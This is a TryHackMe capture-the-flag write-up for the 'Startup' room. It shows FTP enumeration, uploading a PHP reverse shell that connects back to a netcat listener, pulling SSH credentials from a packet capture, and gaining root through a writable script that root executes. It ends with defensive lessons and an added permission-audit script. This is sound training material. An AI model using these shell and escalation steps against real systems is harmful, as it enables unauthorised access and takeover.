Challenges: Startup (TryHackMe)

Jebitok

Welcome to Spice Hut, a quirky startup that sells spices and sandwiches—but more importantly, has questionable security practices. As part of a penetration testing engagement, our goal was to assess their infrastructure and attempt full system compromise. From initial enumeration to gaining root access, this box tested a wide range of fundamental skills, including service enumeration, steganography, reverse shells, PCAP analysis, and privilege escalation via weak scripting logic.

This write-up summarizes the full exploit chain used during the engagement, the vulnerabilities discovered, and key lessons learned throughout the process.

Welcome to Spice Hut!

We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!

Answer the questions below

  1. What is the secret spicy soup recipe?

    nmap -sC -sV IP_Address

    ftp IP_Address
    Anonymous

    get notice.txt

    get important.jpg

    cat notice.txt

     Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus
    

    sudo pip3 install capstone==4.0.2

    binwalk -e important.jpg

The image is sort of a meme.

Next, we copy a PHP reverse shell file and upload it over FTP, then use it to get initial user access:

    cp /usr/share/webshells/php/php-reverse-shell.php shell.php

    nano shell.php

Edit the IP_Address and port in the file, then log back in to FTP and use these commands:

    ftp IP_Address

    put shell.php

    nc -lvnp 4444

Go to http://IP_Address/files/ftp/ and click on the shell.php file. The reverse shell connects back.

Switch to a fully interactive TTY shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

We found a recipe.txt file that reveals the recipe.

  2. What are the contents of user.txt?

    Back on FTP, there’s an ftp folder that we had missed; checking it, we find a pcapng file that will help us with this step.

    ftp IP_Address

    get suspicious.pcapng

    Open the pcapng file in Wireshark.

    Select a packet with the TCP protocol, click Analyze, then Follow and TCP Stream, and keep changing streams; look through stream 7.

We have a user called lennie and a password, so we can use SSH to access the user flag:

    ssh lennie@IP_Address

    find / -type f -name user.txt 2> /dev/null

  3. What are the contents of root.txt?

    cd scripts/

    cat planner.sh

    #!/bin/bash 
    echo $LIST > /home/lennie/scripts/startup_list.txt
    /etc/print.sh

    ls -lah /etc/print.sh

    /etc$ chmod +x print.sh

    /$ /tmp/rootbash -p

    # find / -type f -name root.txt 2> /dev/null

Credits

Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!

Find my official writeup here: https://www.youtube.com/watch?v=3qNxI1OggGc

I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.

I'd like to thank my testers Amit25095, BarZigmon and powershot.

Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.

And of course, I'd like to thank you for playing. Hope to see you soon!

This box was an excellent showcase of practical penetration testing skills. From basic enumeration and file analysis to privilege escalation via insecure script execution, Spice Hut reinforces the importance of:

  • Disabling anonymous FTP access in production environments.

  • Avoiding hardcoded or plaintext credentials.

  • Reviewing file and directory permissions, especially scripts run by privileged users.

  • Analyzing network captures for leaked sensitive information.

While the memes and quirky dialogue made the journey fun, the security flaws were very real—and could easily be exploited in a real-world scenario. Spice Hut has since taken your advice seriously, and with your help, they’ve now hired a proper security team. 🍜
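The root step above hinges on planner.sh invoking /etc/print.sh, which is the case the permissions bullet warns about. The audit below is an added example, not part of the original write-up or the room: it checks a script and every absolute path that starts a command line in it for an untrusted owner or group/other write access. The function names, the temp-dir sample and the default trusted uid of 0 are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag files that a privileged
# script depends on but that someone other than the trusted owner can modify.

# check_path PATH TRUSTED_UID -> prints findings, returns 1 if any.
check_path() {
    p=$1; want=$2; rc=0
    if [ ! -e "$p" ]; then
        echo "MISSING $p"; return 1
    fi
    # ls -Lldn: field 1 is the mode string, field 3 the numeric owner uid.
    info=$(ls -Lldn "$p" | awk '{print $1, $3}')
    mode=${info%% *}; owner=${info##* }
    if [ "$owner" != "$want" ]; then
        echo "OWNER $p uid=$owner expected=$want"; rc=1
    fi
    # Character 6 of the mode string is group-write, character 9 other-write.
    case $mode in
        ?????w*|????????w*) echo "WRITABLE $p mode=$mode"; rc=1 ;;
    esac
    return $rc
}

# audit_script SCRIPT [TRUSTED_UID]: check SCRIPT and every absolute path that
# starts a command line in it. TRUSTED_UID defaults to 0 (root), an assumption.
audit_script() {
    script=$1; trusted=${2:-0}; failed=0
    check_path "$script" "$trusted" || failed=1
    for called in $(awk '$1 ~ /^\// {print $1}' "$script" 2>/dev/null); do
        check_path "$called" "$trusted" || failed=1
    done
    return $failed
}

# Constructed sample with the same shape as planner.sh calling print.sh,
# built in a temp dir; the helper is deliberately left world-writable.
make_sample() {
    d=$(mktemp -d) || return 1
    printf '#!/bin/bash\necho $LIST > %s/list.txt\n%s/print.sh\n' "$d" "$d" > "$d/planner.sh"
    printf '#!/bin/bash\necho constructed\n' > "$d/print.sh"
    chmod 755 "$d/planner.sh"; chmod 777 "$d/print.sh"
    echo "$d"
}

sample=$(make_sample)
audit_script "$sample/planner.sh" "$(id -u)" || echo "review the findings above"
rm -rf "$sample"
```

On the box's layout the call would be `audit_script /home/lennie/scripts/planner.sh`; parent directories deserve the same check and are not covered here.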
